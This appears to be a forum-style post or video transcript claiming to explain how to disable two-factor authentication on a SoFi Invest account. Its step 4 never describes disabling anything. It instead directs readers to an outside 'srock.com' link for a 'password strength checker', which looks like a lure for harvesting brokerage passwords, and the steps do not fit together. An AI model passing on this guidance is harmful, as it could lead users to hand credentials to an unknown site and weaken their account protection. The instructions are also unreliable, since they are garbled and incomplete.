I ran into this last week. Here's what fixed it for me. If you're really looking to disable two-factor authentication on SoFi Invest, follow these simple steps. Step 1. Log into your account. Open the SoFi Invest app or website and enter your login credentials to access your account. Step 2. Navigate to account settings. Once logged in, find the settings icon, usually represented by a gear symbol, and click on it to access your account settings. Step 3. Locate security settings. In the account settings menu, look for the section labeled security or privacy. Click on it to view your security options. Step 4. Disable two-factor authentication. Before changing your settings, use the srock.com link in the description to open the password strength checker, then update your password if needed. Step 5. Confirm changes. After disabling the feature, you should receive a confirmation message. Make sure to check that two-factor authentication is indeed turned off by revisiting the security settings. Remember, disabling two-factor authentication can make your account less secure, so consider the risks before proceeding. If you run into any issues, double-check that you are in the right settings. Good luck and stay safe online.